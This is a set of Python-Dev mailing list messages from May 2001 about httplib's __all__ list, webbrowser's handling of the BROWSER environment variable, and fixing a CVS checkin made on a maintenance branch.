1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says "release21-maint". Did I muff it? If so, how should I do an unmuff operation? Skip From robin at jessikat.fsnet.co.uk Thu May 31 20:33:02 2001 From: robin at jessikat.fsnet.co.uk (Robin Becker) Date: Thu, 31 May 2001 19:33:02 +0100 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com> References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro writes >>>>>> "Robin" == Robin Becker writes: > > Robin> from httplib import * > > Robin> class Bongo(HTTPConnection): > Robin> pass > ... > Robin> NameError: name 'HTTPConnection' is not defined > >It was a brain fart on my part when creating httplib.__all__. >HTTPConnection was not included in that list. I will check in a fix. >In the 2.1 release __all__ was defined as > > __all__ = ["HTTP"] > >I have changed that to > > __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection", > "HTTPException", "NotConnected", "UnknownProtocol", > "UnknownTransferEncoding", "IllegalKeywordArgument", > "UnimplementedFileMode", "IncompleteRead", > "ImproperConnectionState", "CannotSendRequest", >"CannotSendHeader", > "ResponseNotReady", "BadStatusLine", "error"] thanks; I'm still a bit puzzled as to the exact semantics. It just looks wrong. Is __all__ the only way to get things into the * version of import? Presumably HTTPConnection is being marked as a potential global in the compile phase. -- Robin Becker From skip at pobox.com Thu May 31 21:27:12 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 14:27:12 -0500 Subject: [Python-Dev] Re: 2.1 strangness In-Reply-To: References: <15126.34635.67975.31473@beluga.mojam.com> Message-ID: <15126.39696.370516.926735@beluga.mojam.com> Robin> thanks; I'm still a bit puzzled as to the exact semantics. It Robin> just looks wrong. Is __all__ the only way to get things into the Robin> * version of import? Essentially, yes. If you want to just dispense with it __all__together (=:-o), you can textually replace __all__ with ___all__ in each of the standard library modules: cd /usr/local/lib/python2.1 for f in *.py ; do sed -e 's/___*all__/___all__/g' < $f > $f.tmp mv $f.tmp $f done Note that I didn't touch any files in directories under the basic Lib directory. Robin> Presumably HTTPConnection is being marked as a potential global Robin> in the compile phase. It has nothing to do with module compilation. The contents of __all__ are a static thing in the text of the .py file, and thusfar almost entirely due to me studying the inputs at hand and making a decision about what belonged and what didn't. Some python-dev people caught ommissions and added them before the 2.1 release. Other than that, the mistakes are all mine. I had some misgivings about the whole thing during the midst of the task and still do, but grumbled once and completed it. Skip From skip at pobox.com Thu May 31 21:57:21 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 14:57:21 -0500 Subject: [Python-Dev] weird webbrowser behavior Message-ID: <15126.41505.987887.477670@beluga.mojam.com> I'm using Gnome under Mandrake 8.0 and getting very strange results using webbrowser (indirectly via pydoc). Apparently, Gnome's init code sets the BROWSER environment variable to "nautilus" (much to my surprise) and webbrowser trusts it as the god's honest truth, even though nautilus has not been registered with the webbrowser module (am I supposed to add that sort of stuff to site.py?). Accordingly, _tryorder is ['nautilus'] but doesn't appear in _browser.keys() is ['lynx', 'links', 'netscape', 'kfm', 'mozilla']. I think webbrowser should either ignore elements of BROWSER if they have not previously been registered (and can't be found by _iscommand) or try to register them using GenericBrowser. Users are apparently not the only people setting BROWSER, so the comment in the code: # It's the user's responsibility to register handlers for any unknown # browser referenced by this value, before calling open(). seems like flawed logic to me. Skip From esr at thyrsus.com Thu May 31 22:08:21 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Thu, 31 May 2001 16:08:21 -0400 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500 References: <15126.41505.987887.477670@beluga.mojam.com> Message-ID: <20010531160821.A10314@thyrsus.com> Skip Montanaro : > I think webbrowser should either ignore elements of BROWSER if > they have not previously been registered (and can't be found by _iscommand) > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: Fred Drake and I are co-responsible for that code. If you want to patch it to do this, I won't object. -- Eric S. Raymond "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin, Historical Review of Pennsylvania, 1759. From fdrake at acm.org Thu May 31 22:18:26 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 16:18:26 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > I just updated httplib.py to expand the list of names in its __all__ list. > I was operating on version 1.34. After the checkin I am looking at version > 1.34.2.1. I see that Lib/CVS/Tag exists in my directory tree and says > "release21-maint". Did I muff it? If so, how should I do an unmuff > operation? If that's really a muff, revert the change: cd .../Lib/ cvs diff -r1.34.2.1 -r1.34 httplib.py | patch and commit the new version as 1.34.2.2: cvs commit -m 'unmuff...' httplib.py -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From skip at pobox.com Thu May 31 22:30:22 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 15:30:22 -0500 Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <20010531160821.A10314@thyrsus.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.43486.320228.376505@beluga.mojam.com> Eric> Fred Drake and I are co-responsible for that code. If you want to Eric> patch it to do this, I won't object. Here's a first pass that seems to work for me: https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470 though it doesn't attempt to recover if _tryorder winds up empty. Skip From skip at pobox.com Thu May 31 22:48:40 2001 From: skip at pobox.com (Skip Montanaro) Date: Thu, 31 May 2001 15:48:40 -0500 Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> Message-ID: <15126.44584.300357.360209@beluga.mojam.com> >> I just updated httplib.py to expand the list of names in its __all__ >> list. I was operating on version 1.34. After the checkin I am >> looking at version 1.34.2.1. I see that Lib/CVS/Tag exists in my >> directory tree and says "release21-maint". Did I muff it? If so, >> how should I do an unmuff operation? Fred> If that's really a muff, revert the change: Fred> cd .../Lib/ Fred> cvs diff -r1.34.2.1 -r1.34 httplib.py | patch Fred> and commit the new version as 1.34.2.2: Fred> cvs commit -m 'unmuff...' httplib.py Functionally, the checkin isn't a muff (it does have the change I intended), but I was worried about the version number. Should I have checked it in as version 1.34.2.1 or 1.35? Skip From fdrake at acm.org Thu May 31 23:00:34 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:00:34 -0400 (EDT) Subject: [Python-Dev] weird webbrowser behavior In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com> References: <15126.41505.987887.477670@beluga.mojam.com> <20010531160821.A10314@thyrsus.com> Message-ID: <15126.45298.666556.20710@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > or try to register them using GenericBrowser. Users are apparently not the > only people setting BROWSER, so the comment in the code: > > # It's the user's responsibility to register handlers for any unknown > # browser referenced by this value, before calling open(). > > seems like flawed logic to me. Eric S. Raymond writes: > Fred Drake and I are co-responsible for that code. If you want to patch it > to do this, I won't object. I wouldn't object either. I *do* object to the system setting that variable by default by either Mandrake or Gnome -- that's just stupid and inconsiderate of the user. Now, if anyone can provide support for Nautilis, I won't object to that either. Unfortunately, Mandrake's installer stinks at upgrading (it couldn't seem to locate my 7.2 installation) and I don't have the time to figure that out. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Thu May 31 23:04:30 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 31 May 2001 17:04:30 -0400 (EDT) Subject: [Python-Dev] Damn... I think I might have just muffed a checkin In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com> References: <15126.34825.167026.520535@beluga.mojam.com> <15126.42770.17954.452663@cj42289-a.reston1.va.home.com> <15126.44584.300357.360209@beluga.mojam.com> Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com> Skip Montanaro writes: > Functionally, the checkin isn't a muff (it does have the change I intended), > but I was worried about the version number. Should I have checked it in as > version 1.34.2.1 or 1.35? If the change should happen on the branch, leave it in. If it's also needed on the HEAD, check it in again there, and you're done. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations